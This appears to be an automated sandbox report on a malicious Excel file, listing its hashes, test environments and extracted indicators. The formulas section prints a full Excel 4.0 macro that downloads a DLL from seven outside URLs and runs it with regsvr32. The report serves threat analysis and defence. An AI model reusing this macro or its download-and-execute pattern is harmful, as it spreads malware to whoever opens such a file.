Static task
static1
Behavioral task
behavioral1
Sample
c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e.xlsx
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e.xlsx
Resource
win10v2004-20240802-en
General
-
Target
c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e
-
Size
46KB
-
MD5
becb7a238516b57164e3aa3eefdcecbf
-
SHA1
aabdfc17de5e1b94a2f2c523f3e7122897bb2fee
-
SHA256
c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e
-
SHA512
cdc8fd1eb39d47d19e0ce86f0c074f73f100ad2639e21579aae1ecb2108bd6def16bf850eb5b55a5017b37c9e1071061b3ea975065512b6260c91d415f0c2f98
-
SSDEEP
768:mCra70og13bQiBpFViBYYg8z/cZ2IQYRAvYUbTUPMr7nIIbwPvvfOa6rw7M39vdY:zraQog5bz3iBC8z/XYCpK60Ibwv3OHsL
Malware Config
Extracted
http://www.arkpp.com/ARIS-BSU/9K1/
http://www.avrworks.com/mail/0Z4GbaKuDTGprJ/
http://www.babylinesl.com/catalog/iVsl6YvlyIyX/
https://physioacademy.co.uk/blog/Qs8QZTp0Z6nKf9YjVBMS/
https://unada.us/acme-challenge/3NXwcYNCa/
https://automobile-facile.fr/wp-admin/QV/
https://alebit.de/css/gqKtdKmTsC4iDh/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.arkpp.com/ARIS-BSU/9K1/","..\fbd.dll",0,0) =IF('EGVEB'!D9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.avrworks.com/mail/0Z4GbaKuDTGprJ/","..\fbd.dll",0,0)) =IF('EGVEB'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.babylinesl.com/catalog/iVsl6YvlyIyX/","..\fbd.dll",0,0)) =IF('EGVEB'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://physioacademy.co.uk/blog/Qs8QZTp0Z6nKf9YjVBMS/","..\fbd.dll",0,0)) =IF('EGVEB'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://unada.us/acme-challenge/3NXwcYNCa/","..\fbd.dll",0,0)) =IF('EGVEB'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://automobile-facile.fr/wp-admin/QV/","..\fbd.dll",0,0)) =IF('EGVEB'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alebit.de/css/gqKtdKmTsC4iDh/","..\fbd.dll",0,0)) =IF('EGVEB'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\fbd.dll") =RETURN()
Signatures
Files
-
c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e.xlsx office2007